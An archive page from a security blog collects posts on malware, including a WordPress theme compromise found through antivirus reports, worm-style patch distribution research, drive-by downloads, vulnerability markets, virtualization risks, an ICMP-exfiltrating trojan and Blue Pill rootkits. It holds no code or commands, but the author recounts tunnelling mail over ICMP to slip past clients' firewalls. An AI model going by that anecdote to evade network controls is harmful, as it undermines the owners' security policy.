Archive

Archive for the ‘Malware’ Category

Why Steeling Your Security Is Less Stainless and More Irony…

March 5th, 2012 3 comments

(I originally pre-pended to this post a lengthy update based on my findings and incident response, but per a suggestion from @jeremiahg, I’ve created a separate post here for clarity)

Earlier today I wrote about the trending meme in the blogosphere/security bellybutton squad wherein the notion that security — or the perceived lacking thereof — is losing the “war.”

My response was that the expectations and methodology by which we measure success or failure is arbitrary and grossly inaccurate.  Furthermore, I suggest that the solutions we have at our disposal are geared toward solving short-term problems designed to generate revenue for vendors and solve point-specific problems based on prevailing threats and the appetite to combat them.

As a corollary, if you reduce this down to the basics, the tools we have at our disposal that we decry as useless often times work just fine…if you actually use them.

For most of us, we do what we can to provide appropriate layers of defense where possible but our adversaries are crafty and in many cases more skilled.  For some, this means our efforts are a lost cause but the reality is that often times good enough is good enough…until it isn’t.

Like it wasn’t today.

Let me paint you a picture.

A few days ago a Wired story titled “Is antivirus a waste of money?” hit the wires that quoted many (of my friends) as saying that security professionals don’t run antivirus.  There were discussions about efficacy, performance and usefulness. Many of the folks quoted in that article also run Macs.  There was some interesting banter on Twitter also.

If we rewind a few weeks, I was contacted by two people a few days apart, one running a FireEye network-based anti-malware solution and another running a mainstream host-based anti-virus solution.

Both of these people let me know that their solutions detected and blocked a Javascript-based redirection attempt from my blog which runs a self-hosted WordPress installation.

I pawed through my blog’s PHP code, turned off almost every plug-in, ran the exploit scanner…all the while unable to reproduce the behavior on my Mac or within a fresh Windows 7 VM.

The FireEye report ultimately was reported back as a false positive while the host-based AV solution couldn’t be reproduced, either.

Fast forward to today and after I wrote the blog “You know what’s dead? Security…” I had a huge number of click-throughs from my tweet.

The point of my blog was that security isn’t dead and we aren’t so grossly failing but rather suffering a death from a thousand cuts.  However, while we’ve got a ton of band-aids, it doesn’t make it any less painful.

Speaking of pain, almost immediately upon posting the tweet, I received reports from 5-6 people indicating their AV solutions detected an attempted malicious code execution, specifically a Javascript redirector.

This behavior was commensurate with the prior “sightings” and so with the help of @innismir and @chort0, I set about trying to reproduce the event.

@chort0 found that a hidden iFrame was redirecting to a site hosting in Belize (screen caps later) that ultimately linked to other sites in Russia and produced a delightful greeting which said “Gotcha!” after attempting to drop an executable.

Again, I was unable to duplicate and it seemed that once loaded, the iFrame and file dropper did not reappear.  @innismir didn’t get the iFrame but grabbed the dropped file.

This led to further investigation that it was likely this was an embedded compromise within the theme I was using.  @innismir found that the Sakura theme included “…woo-tumblog [which] uses a old version of TimThumb, which has a hole in it.”

I switched back to a basic built-in theme and turned off the remainder of the non-critical plug-ins.

Since I have no way of replicating the initial drop attempt, I can only hope that this exercise which involved some basic AV tools, some browser debug tools, some PCAP network traces and good ole investigation from three security wonks has paid off…

ONLY YOU CAN PREVENT MALWARE FIRES (so please let me know if you see an indication of an attempted malware infection.)

Now, back to the point at hand…I would never have noticed this (or more specifically others wouldn’t) had they not been running AV.

So while many look at these imperfect tools as a failure because they don’t detect/prevent all attacks, imagine how many more people I may have unwittingly infected accidentally.

Irony?  Perhaps, but what happened following the notification gives me more hope (in the combination of people, community and technology) than contempt for our gaps as an industry.

I plan to augment this post with more details and a conclusion about what I might have done differently once I have a moment to digest what we’ve done and try and confirm if it’s indeed repaired.  I hope it’s gone for good.

Thanks again to those of you who notified me of the anomalous behavior.

What’s scary is how many of you didn’t.

Is security “losing?”

Ask me in the morning…I’ll likely answer that from my perspective, no, but it’s one little battle at a time that matters.

/Hoff

Enhanced by Zemanta

A Worm By Any Other Name Is…An Information Epidemic?

February 18th, 2008 2 comments

Virus
Martin McKeay took exception to some interesting Microsoft research that suggested that the similar methodologies and tactics used by malicious software such as worms/viri, could also be used as an effective distributed defense against them:

Microsoft researchers are hoping to use "information epidemics" to distribute software patches more efficiently.

Milan Vojnović
and colleagues from Microsoft Research in Cambridge, UK, want to make
useful pieces of information such as software updates behave more like
computer worms: spreading between computers instead of being downloaded
from central servers.

The research may also help defend against malicious types of worm, the researchers say.

Software
worms spread by self-replicating. After infecting one computer they
probe others to find new hosts. Most existing worms randomly probe
computers when looking for new hosts to infect, but that is
inefficient, says Vojnović, because they waste time exploring groups or
"subnets" of computers that contain few uninfected hosts.

Despite the really cool moniker (information epidemic,) this isn’t a particularly novel distribution approach and in fact, we’ve seen malware do this.  However, it is interesting to see that an OS vendor (Microsoft) is continuing to actively engage in research to explore this approach despite the opinions of others who simply claim it’s a bad idea.  I’m not convinced either way, however.

I, for one, am all for resilient computing environments that are aware of their vulnerabilities and can actively defend against them.  I will be interested to see how this new paper builds off of work previously produced on the subject and its corresponding criticism.

Vojnović’s team have designed smarter strategies that can exploit the way some subnets provide richer pickings than others.

The
ideal approach uses prior knowledge of the way uninfected computers are
spread across different subnets. A worm with that information can focus
its attention on the most fruitful subnets – infecting a given
proportion of a network using the smallest possible number of probes.

But
although prior knowledge could be available in some cases – a company
distributing a patch after a previous worm attack, for example –
usually such perfect information will not be available. So the
researchers have also developed strategies that mean the worms can
learn from experience.

In
the best of these, a worm starts by randomly contacting potential new
hosts. After finding one, it uses a more targeted approach, contacting
only other computers in the same subnet. If the worm finds plenty of
uninfected hosts there, it keeps spreading in that subnet, but if not,
it changes tack.

That being the case, here’s some of Martin’s heartburn:

But the problem is, if both beneficial and malign
software show the same basic behavior patterns, how do you
differentiate between the two? And what’s to stop the worm from being
mutated once it’s started, since bad guys will be able to capture the
worms and possibly subverting their programs.

The article isn’t clear on how the worms will secure their network,
but I don’t believe this is the best way to solve the problem that’s
being expressed. The problem being solved here appears to be one of
network traffic spikes caused by the download of patches. We already
have a widely used protocols that solve this problem, bittorrents and
P2P programs. So why create a potentially hazardous situation using
worms when a better solution already exists. Yes, torrents can be
subverted too, but these are problems that we’re a lot closer to
solving than what’s being suggested.

I don’t want something that’s viral infecting my computer, whether
it’s for my benefit or not. The behavior isn’t something to be
encouraged. Maybe there’s a whole lot more to the paper, which hasn’t
been released yet, but I’m not comfortable with the basic idea being
suggested. Worm wars are not the way to secure the network.

I think that some of the points that Martin raises are valid, but I also think that he’s reacting mostly out of fear to the word ‘worm.’  What if we called it "distributed autonomic shielding?" 😉

Some features/functions of our defensive portfolio are going to need to become more self-organizing, autonomic and intelligent and that goes for the distribution of intelligence and disposition, also.  If we’re not going to advocate being offensive, then we should at least be offensively defensive.  This is one way of potentially doing this.

Interestingly, this dovetails into some discussions we’ve had recently with Andy Jaquith and Amrit Williams; the notion of herds or biotic propagation and response are really quite fascinating.  See my post titled "Thinning the Herd & Chlorinating the Gene Pool"

I’ve left out most of the juicy bits of the story so you should go read it and churn on some of the very interesting points raised as part of the discussion.

/Hoff

Update: Schneier thinks this is a lousy idea. That doesn’t move me one direction or the other, but I think this is cementing my opinion that had the author not used the word ‘worm’ in his analog the idea might not be dismissed so quickly…

Also, Wismer via a comment on Martin’s blog pointed to an interesting read from Vesselin Bontchev titled "Are "Good" Computer Viruses Still a Bad Idea?"

Update #2: See the comments section about how I think the use case argued by Schneier et. al. is, um, slightly missing the point.  Strangely enough, check out the Network World article that just popped up which says ""This was not the primary scenario targeted for this research," according to a statement."

Duh.

Google Security: Frightening Statistics On Drive-By Malware Downloads…

February 12th, 2008 1 comment

Read a scary report from Google’s security team today titled "All your iFrame Are Point to Us" regarding the evolving trends in search-delivered drive-by malware downloads.  Check out the full post here, but the synopsis follows:

GoogledbmalwareIt has been over a year and a half since we started to identify web pages that infect vulnerable hosts via drive-by downloads,
i.e. web pages that attempt to exploit their visitors by installing and
running malware automatically. During that time we have investigated
billions of URLs and found more than three million unique URLs on over
180,000 web sites automatically installing malware. During the course
of our research, we have investigated not only the prevalence of
drive-by downloads but also how users are being exposed to malware and
how it is being distributed. Our research paper is currently under peer
review, but we are making a technical report [PDF] available now.  Although our technical report contains a lot more detail, we present some high-level findings here:

The
above graph shows the percentage of daily queries that contain at least
one search result labeled as harmful. In the past few months, more than
1% of all search results contained at least one result that we believe
to point to malicious content and the trend seems to be increasing.

Ugh.  The technical report offers some really good background data on infrastructure and methodology,  geographic distribution, properties and delivery mechanisms.  Fascinating reading.

/Hoff

Categories: Google, Malware Tags:

The Russian Business Network, ShadowCrew, HangUp Team, 76service, “Malware as a Service” (MaaS) and “Hoff is Thirsty.”

October 9th, 2007 6 comments

Natural_mineral_water_essentuky
Scott Berinato posted the first of three installments of an expose highlighting the economics of the malware industry in CSO magazine.  It’s a fascinating read with a blow-by-blow of how Don Jackson of SecureWorks infiltrated a malware distribution cartel and got to witness firsthand the dynamics of the malware marketplace as a functional economy. 

It really demonstrated well the evolution of the stratified distribution system which mimics that of the drug trade.

What really made the story, however, was this incredible quote from yours truly.  Prepare to be awed.  I know I was.

Here’s the setup:

“Do you have a credit card? They’ve got it,” states another researcher who used to write malware for a hacking group and who now works intelligence on the Internet underground and could only speak anonymously to protect his cover. “I’m not exaggerating. Your
    numbers will be compromised four or five times, even if they’re not used yet.”

Here’s my earth-shattering revelation:

“I take for granted everything I do on the Internet is public and everything in my wallet is owned,” adds Chris Hoff, the security strategist at Crossbeam and former CISO of
    Westcorp, a $25 billion financial services company. “But what do I do? Do I pay for everything in cash like my dad? I defy you to do that. I was at a hotel recently and I
    couldn’t get a bottle of water without swiping my credit card. And I was thirsty! What was I gonna do?”

…and now we finish with the closer.   

That’s the thing about this wave of Internet crime.
Everyone has apparently decided that it’s an unavoidable cost of doing business online, a risk they’re willing to take, and that whatever’s being lost to crime online is acceptable loss. Banks, merchants, consumers, they’re thirsty! What are they gonna do?

See what I mean!?  Without that little statement about being parched, the whole malware story just doesn’t hang together.

At all.

Don Jackson and his little sleuthy malware research doesn’t have ANYTHING on my horrific experience trying to extract a bottle of Aqua Fina liquid refreshment from a vending machine on the 23rd floor of a Scottish hotel.

Wait until the second installment when I talk about Mayonnaise.

Journalists:  Please email me immediately as I’m available NOW as your go-to source for non-nonsensical non-sequitirs  that make your editorials just SCREAM!  Need to get to 800 words and got nuthin’?  Call the Hoff.

Wow.

/Hoff

P.S. I’m not @ Crossbeam anymore.  I was the Chief Security Strategist. It was "WesCorp."  My dad is dead.  The rest is accurate, however…except I keep getting quoted as saying "gotta."  I swear, it’s my accent!  I don’t say "gotta."  Really.

Categories: Malware Tags:

Fat Albert Marketing and the Monetizing of Vulnerability Research

July 8th, 2007 No comments

Money
Over the last couple of years, we’ve seen the full spectrum of disclosure and "research" portals arrive on scene; examples stem from the Malware Distribution Project to 3Com/TippingPoint’s Zero Day Initiative.  Both of these examples illustrate ways of monetizing the output trade of vulnerability research.   

Good, bad or indifferent, one would be blind not to recognize that these services are changing the landscape of vulnerability research and pushing the limits which define "responsible disclosure."

It was only a matter of time until we saw the mainstream commercial emergence of the open vulnerability auction which is just another play on the already contentious marketing efforts blurring the lines between responsible disclosure for purely "altruistic" reasons versus commercial gain.

MushmouthEnter Wabisabilabi, the eBay of Zero Day vulnerabilities.   

This auction marketplace for vulnerabilities is marketed as a Swiss "…Laboratory & Marketplace Platform for Information Technology Security" which "…helps customers defend their databases, IT infrastructure, network, computers, applications, Internet offerings and access."

Despite a name which sounds like Mushmouth from Fat Albert created it (it’s Japanese in origin, according to the website) I am intrigued by this concept and whether or not it will take off.

I am, however, a little unclear on how customers are able to purchase a vulnerability and then become more secure in defending their assets. 

A vulnerability without an exploit, some might suggest, is not a vulnerability at all — or at least it poses little temporal risk.  This is a fundamental debate of the definition of a Zero-Day vulnerability. 

Further, a vulnerability that has a corresponding exploit but without a countermeasure (patch, signature, etc.) is potentially just as useless to a customer if you have no way of protecting yourself.

If you can’t manufacture a countermeasure, even if you hoard the vulnerability and/or exploit, how is that protection?  I suggest it’s just delaying the inevitable.

I am wondering how long until we see the corresponding auctioning off of the exploit and/or countermeasure?  Perhaps by the same party that purchased the vulnerability in the first place?

Today in the closed loop subscription services offered by vendors who buy vulnerabilities, the subscribing customer gets the benefit of protection against a threat that they may not even know they have, but for those who can’t or won’t pony up the money for this sort of subscription (which is usually tied to owning a corresponding piece of hardware to enforce it,) there exists a point in time between when the vulnerability is published and when it this knowledge is made available universally.

Depending upon this delta, these services may be doing more harm than good to the greater populous.

In fact, Dave G. over at Matasano argues quite rightly that by publishing even the basic details of a vulnerability that "researchers" will be able to more efficiently locate the chunks of code wherein the vulnerability exists and release this information publicly — code that was previously not known to even have a vulnerability.

Each of these example vulnerability service offerings describes how the vulnerabilities are kept away from the "bad guys" by qualifying their intentions based upon the ability to pay for access to the malicious code (we all know that criminals are poor, right?)  Here’s what the Malware Distribution Project describes as the gatekeeper function:

Why Pay?

Easy; it keeps most, if not all of the malicious intent, outside the
gates. While we understand that it may be frustrating to some people
with the right intentions not allowed access to MD:Pro, you have to
remember that there are a lot of people out there who want to get
access to malware for malicious purposes. You can’t be responsible on
one hand, and give open access to everybody on the other, knowing that
there will be people with expressly malicious intentions in that group.

ZDI suggests that by not reselling the vulnerabilities but rather protecting their customers and ultimately releasing the code to other vendors, they are giving back:

The Zero Day Initiative (ZDI) is unique in how the acquired
vulnerability information is used. 3Com does not re-sell the
vulnerability details or any exploit code. Instead, upon notifying the
affected product vendor, 3Com provides its customers with zero day
protection through its intrusion prevention technology. Furthermore,
with the altruistic aim of helping to secure a broader user base, 3Com
later provides this vulnerability information confidentially to
security vendors (including competitors) who have a vulnerability
protection or mitigation product.

As if you haven’t caught on yet, it’s all about the Benjamins. 

We’ve seen the arguments ensue regarding third party patching.  I think that this segment will heat up because in many cases it’s going to be the fastest route to protecting oneself from these rapidly emerging vulnerabilities you didn’t know you had.

/Hoff

My IPS (and FW, WAF, XML, DBF, URL, AV, AS) *IS* Bigger Than Yours Is…

May 23rd, 2007 No comments

Butrule225Interop has has been great thus far.  One of the most visible themes of this year’s show is (not suprisingly) the hyped emergence of 10Gb/s Ethernet.  10G isn’t new, but the market is now ripe with products supporting it: routers, switches, servers and, of course, security kit.

With this uptick in connectivity as well as the corresponding float in compute power thanks to Mr. Moore AND some nifty evolution of very fast, low latency, reasonably accurate deep packet inspection (including behavioral technology,) the marketing wars have begun on who has the biggest, baddest toys on the block.

Whenever this discussion arises, without question the notion of "carrier class" gets bandied about in order to essentially qualify a product as being able to withstand enormous amounts of traffic load without imposing latency. 

One of the most compelling reasons for these big pieces of iron (which are ultimately a means to an end to run software, afterall) is the service provider/carrier/mobile operator market which certainly has its fair share of challenges in terms of not only scale and performance but also security.

I blogged a couple of weeks ago regarding the resurgence of what can be described as "clean pipes" wherein a service provider applies some technology that gets rid of the big lumps upstream of the customer premises in order to deliver more sanitary network transport.

What’s interesting about clean pipes is that much of what security providers talk about today is only actually a small amount of what is actually needed.  Security providers, most notably IPS vendors, anchor the entire strategy of clean pipes around "threat protection" that appears somewhat one dimensional.

This normally means getting rid of what is generically referred to today as "malware," arresting worm propagation and quashing DoS/DDoS attacks.  It doesn’t speak at all to the need for things that aren’t purely "security" in nature such as parental controls (URL filtering,) anti-spam, P2P, etc.  It appears that in the strictest definition, these aren’t threats?

So, this week we’ve seen the following announcements:

  • ISS announces their new appliance that offers 6Gb/s of IPS
  • McAfee announces thei new appliance that offers 10Gb/s of IPS

The trumpets sounded and the heavens parted as these products were announced touting threat protection via IPS at levels supposedly never approached before.  More appliances.  Lots of interfaces.  Big numbers.  Yet to be seen in action.  Also, to be clear a 2U rackmount appliance that is not DC powered and non-NEBS certified isn’t normally called "Carrier-Class."

I find these announcements interesting because even with our existing products (which run ISS and Sourcefire’s IDS/IPS software, by the way) we can deliver 8Gb/s of firewall and IPS today and have been able to for some time.

Lisa Vaas over @ eWeek just covered
the ISS and McAfee announcements and she was nice enough to talk about
our products and positioning.  One super-critical difference is that along with high throughput and low latency you get to actually CHOOSE which IPS you want to run — ISS, Sourcefire and shortly Check Point’s IPS-1.

You can then combine that with firewall, AV, AS, URL filtering, web app. and database firewalls and XML security gateways in the same chassis to name a few other functions — all best of breed from top-tier players — and this is what we call Enterprise and Provider-Class UTM folks.

Holistically approaching threat management across the entire spectrum is really important along with the speeds and feeds and we’ve all seen what happens when more and more functionality is added to the feature stack — you turn a feature on and you pay for it performance-wise somewhere else.  It’s robbing Peter to pay Paul.  The processing requirements necessary at 10G line rates to do IPS is different when you add AV to the mix.

The next steps will be interesting and we’ll have to see how the switch and overlay vendors rev up to make their move to have the biggest on the block.  Hey, what ever did happen to that 3Com M160?

Then there’s that little company called Cisco…

{Ed: Oops.  I made a boo-boo and talked about some stuff I shouldn’t have.  You didn’t notice, did you?  Ah, the perils of the intersection of Corporate Blvd. and Personal Way!  Lesson learned. 😉 }

 

Blue Lane VirtualShield for VMWare – Here we go…

March 19th, 2007 1 comment

Arms_diagramarmorlg
Greg Ness from Blue Lane and I have known each other for a while now, and ever since I purchased Blue Lane’s first release of products a few years ago (when I was on the "other" side as a *gasp* customer) I have admired and have taken some blog-derived punishment for my position on Blue Lane’s technology.

I have zero interest in Blue Lane other than the fact that I dig their technology and products and think it solves some serious business problems elegantly and efficiently with a security efficacy that is worth its weight in gold.

Vulnerability shielding (or patch emulation…) is a provocative subject and I’ve gone ’round and ’round with many a fine folk online wherein the debate normally dissolves into the intricacies of IPS vs. vulnerability shielding versus the fact that the solutions solve a business problem in a unique way that works and is cost effective.

That’s what a security product SHOULD do.  Yet I digress.

So, back to Greg @ Blue Lane…he let me know a few weeks ago about Blue Lane’s VirtualShield offering for  VMWare environments.  VirtualShield is the first commercial product that I know of that specifically tackles problems that everyone knows exists in VM environments but have, until now, sat around twirling thumbs at.

In fact, I alluded to some of these issues in this blog entry regarding the perceived "dangers" of virtualization a few weeks ago.

In short, VirtualShield is designed to protect guest VM’s running under a VMWare ESX environment in the following manner (and I quote):

  • Protects virtualized servers regardless of physical location or patch-level;
  • Provides up-to-date protection with no configuration changes and no agent installation on each virtual machine;
  • Eliminates remote threats without blocking legitimate application requests or requiring server reboots; and
  • Delivers appropriate protection for specific applications without requiring any manual tuning.

VS basically sits on top of the HyperVisor and performs a similar set of functionality as the PatchPoint solution does for non-VM systems.

Specifically, VirtualShield discovers the virtual servers running on a server and profiles the VM’s, the application(s), ports and protocols utilized to build and provision the specific OS and application protections (vulnerability shielding) required to protect the VM.

Bluelanevs_alt_conceptual_v2 I think the next section is really the key element of VirtualShield:

As traffic flows through VirtualShield inside the
hypervisor, individual sessions are decoded and monitored for
vulnerable conditions. When necessary, VirtualShield can replicate the
function of a software security patch by applying a corrective action
directly within the network stream, protecting the downstream virtual
server.

As new security patches are released by software
application vendors, VirtualShield automatically downloads the
appropriate inline patches from Blue Lane. Updates may be applied
dynamically without requiring any reboots or reconfigurations of the
virtual servers, the hypervisor, or VirtualShield.

While one might suggest that vulnerability shielding is not new and in some cases certain functionality can be parlayed by firewalls, IPS, AV, etc., I maintain that the manner and model in which Blue Lane elegantly executes this compensating control is unique and effective.

If you’re running a virtualized server environment under VMWare’s ESX architecture, check out VirtualShield…right after you listen to the virtualization podcast with yours truly from RSA.

/Hoff

Virtualization is Risky Business?

February 28th, 2007 6 comments

Dangervirtualization_1
Over the last couple of months, the topic of virtualization and security (or lack thereof) continues to surface as one of the more intriguing topics of relevance in both the enterprise and service provider environments and those who cover them.  From bloggers to analysts to vendors, virtualization is a greenfield for security opportunity and a minefield for the risk models used to describe it.

There are many excellent arguments being discussed which highlight in an ad hoc manner the most serious risks posed by virtualization, and I find many of them accurate, compelling, frightening and relevant.  However, I find that overall, to gauge in relative terms the impact  that these new combinations of attack surfaces, vectors and actors pose, the risk model(s) are immature and incomplete. 

Most of the arguments are currently based on hyperbole and anecdotal references to attacks that could happen.  It reminds me much of the ballyhooed security risks currently held up for scrutiny for mobile handsets.  We know bad things could happen, but for the most part, we’re not being proactive about solving some of the issues before they see the light of day.

The panel I was on at the RSA show highlighted this very problem.  We had folks from VMWare and
RedHat in the audience who assured us that we were just being Chicken Little’s and that the risk is
both quantifiable and manageable today.  We also had other indications that customers felt that while the benefits for virtualization from a cost perspective were huge, the perceived downside from the unknown risks (mostly theoretical) were making them very uncomfortable.

Out of the 150+ folks in the room, approximately 20 had virtualized systems in production roles.  About 25% of them had collapsed multiple tiers of an n-tier application stack (including SOA environments) onto a single host VM.  NONE of them had yet had these systems audited by any third party or regulatory agency.

Rot Roh.

The interesting thing to me was the dichotomy regarding the top-down versus bottom-up approach to
describing the problem.  There was lots of discussion regarding hypervisor (in)security and privilege
escalation and the like, but I thought it interesting that most people were not thinking about the impact on the network and how security would have to change to accommodate it from a bottoms-up (infrastructure and architecture) approach.

The notions of guest VM hopping and malware detection in hypervisors/VM’s are reasonably well discussed (yet not resolved) so I thought I would approach it it from the perspective of what role, if any, the traditional  network infrastructure plays in this.

Thomas Ptacek was right when he said "…I also think modern enterprises are so far from having reasonable access control between the VLANs they already use without virtualization that it’s not a “next 18 month” priority to install them." And I agree with him there.  So, I posit that if one accepts this as true then what to do about the following:

Virtualization
If now we see the consolidation of multiple OS and applications on a single VM host in which the bulk of traffic and data interchange is between the VM’s themselves and utilize the virtual switching fabrics in the VM Host and never hit the actual physical network infrastructure, where, exactly, does this leave the self-defending "network" without VM-level security functionality at the "micro perimeters" of the VM’s?

I recall a question I asked at a recent Goldman Sachs security conference where I asked Jayshree Ullal from Cisco who was presenting Cisco’s strategy regarding virtualized security about how their approach to securing the network was impacted by virtualization in the situation I describe above. 

You could hear cricket’s chirp in the answer.

Talk amongst yourselves….

P.S. More excellent discussions from Matasano (Ptacek) here and Rothman’s bloggy.  I also recommend Greg Ness’ commentary on virtualization and security @ the HyperVisor here.

ICMP = Internet Compromise Malware Protocol…the end is near!

August 9th, 2006 5 comments

Tinhat
Bear with me here as I admire the sheer elegance and simplicity of what this latest piece of malware uses as its covert back channel: ICMP.  I know…nothing fancy, but that’s why I think its simplicity underscores the bigger problem we have in securing this messy mash-up of Internet connected chewy goodness.

When you think about it, even the dopiest of users knows that when they experience some sort of abnormal network access issue, they can just open their DOS (pun intended) command prompt and type "ping…" and then call the helpdesk when they don’t get the obligatory ‘pong’ response.

It’s a really useful little protocol. Good for all sorts of things like out-of-band notifications for network connectivity, unreachable services and even quenching of overly-anxious network hosts. 

Network/security admins like it because it makes troubleshooting easy
and it actually forms some of the glue and crutches that folks depend
upon (unfortunately) to keep their networks running…

It’s had its fair share of negative press, sure. But who amongst us hasn’t?  I mean, Smurfs are cute and cuddly, so how can you blame poor old ICMP for merely transporting them?  Ping of Death?  That’s just not nice!  Nuke Attacks!?  Floods!?

Really, now.  Aren’t we being a bit harsh?  Consider the utility of it all..here’s a great example:

When I used to go onsite for customer engagements, my webmail access/POP-3/IMAP and SMTP access was filtered. Outbound SSH and other types of port filtering were also usually blocked but my old friend ICMP was always there for me…so I tunneled my mail over ICMP using Loki and it worked great..and it always worked because ICMP was ALWAYS open.  Now, today’s IDS/IPS combos usually detect these sorts of tunelling activities, so some of the fun is over.

The annoying thing is that there is really no reason why the entire range of ICMP types need to be open and it’s not that difficult to mitigate the risk, but people don’t because they officially belong to the LBNaSOAC (Lazy Bastard Network and Security Operators and Administrators Consortium.)

However, back to the topic @ hand.  I was admiring the simplicity of this newly-found data-stealer trojan that installs itself as an Internet Exploder (IE) browser helper and ultimately captures keystrokes and screen images when accessing certain banking sites and communicates back to the criminal operators using ICMP and a basic XOR encryption scheme.  You can read about it here.

It’s a cool design.  Right wrong or indifferent, you have to admire the creativity and ubiquity of the back channel…until, of course, you are compromised.

There are so many opportunities for the creative uses of taken-for-granted infrastructure and supporting communication protocols to suggest that this is going to be one hairy, protracted battle.

Submit your vote for the most "clever" use of common protocols/applications for this sort of thing…

Chris

100% Undetectable Malware (?)

July 23rd, 2006 No comments

Bluepillmini
I know I’m checking in late on this story, but for some reason, it just escaped my radar a month or so ago when it appeared…I think that within the context of some of the virtualization discussions in the security realm that it was interesting enough to visit. 

Joanna Rutkowska, a security researcher for Singapore-based IT security firm COSEINC, posts on her Invisible Things blog some amazingly ingenious and frightening glimpses into the possibilities and security implications in terms of malware offered up by the virtualization technologies in AMD’s SVM (Secure Virtual machine)/Pacifica technology.* 

Joanna’s really talking about exploiting the virtualization capabilities of technology like Pacifica to apply stealth by moving the entire operating system into the virtualization layer (in memory — AKA "the matrix.")  If the malware itself controls the virtualization layer, then the "reality" of what is "good" versus "bad" (and detectable as such) is governed within the context of the malware itself.  You can’t detect "bad" via security mechanisms because it’s simply not an available option for the security mechanisms to do so.  Ouch.

This is not quite the same concept that we’ve seen thus far in more "traditional" (?) VM rootkits which load VMM’s below the OS level by exploiting a known vulnerability first.  With Blue Pill, you don’t *need* a vulnerability to exploit.  You should check out this story for more information on this topic such as SubVirt as described on eWeek.

Here is an excerpt from Joanna’s postings thus far:

"Now, imagine a malware (e.g. a network backdoor, keylogger, etc…)
whose capabilities to remain undetectable do not rely on obscurity of
the concept. Malware, which could not be detected even though its
algorithm (concept) is publicly known. Let’s go further and imagine
that even its code could be made public, but still there would be no
way for detecting that this creature is running on our machines…"

"The idea behind Blue Pill is simple: your operating system swallows the
Blue Pill and it awakes inside the Matrix controlled by the ultra thin
Blue Pill hypervisor. This all happens on-the-fly (i.e. without
restarting the system) and there is no performance penalty and all the
devices, like graphics card, are fully accessible to the operating
system, which is now executing inside virtual machine. This is all
possible thanks to the latest virtualization technology from AMD called
SVM/Pacifica."

Intrigued yet? 

This story (once I started researching) was originally commented on by Bill Brenner from techtarget, but I had not seen it until now.  Bill does an excellent job in laying out some of the more relevant points including highlighting the comparisons to the subvirt rootkit as well as some counterpoints aruged from the other side.  That last hyperlink to Kurt Wismer’s blog is just as interesting.  I love the last statement he makes:

"if undetectable virtualization technology can be used to hide the
presence of malware, then equally undetectable virtualization
technology pre-emptively deployed on the system should be able to
detect the undetectable vm-based stealth malware if/when it is encountered…

Alas, I was booked to attend Black Hat in August but my priorities have
been re-clocked, so unfortunately I will not be able to attend Joanna’s
presentation where she is demonstrating her functional prototype of Blue Pill.

I’ve submitted that the notion of virtualization is one of the reasons that embedding more and more security as an embedded function within the "network" as a single pane of glass into the total situational awareness from a security perspective is a flawed proposition as more and more of the "network" will become virtualized within the VM constructs themselves. 

I met with some of Microsoft’s security architects on this very topic and we stared intently at one another hoping for suggestions that would allow us to plan today for what will surely become a more frightening tomorrow.

I’m going to post about this shortly.

Happy reading.  There’s not much light in the rabbit hole, however.

*Here’s a comparison of the Intel/AMD approach to virtualization, including SVM.

Categories: Malware Tags: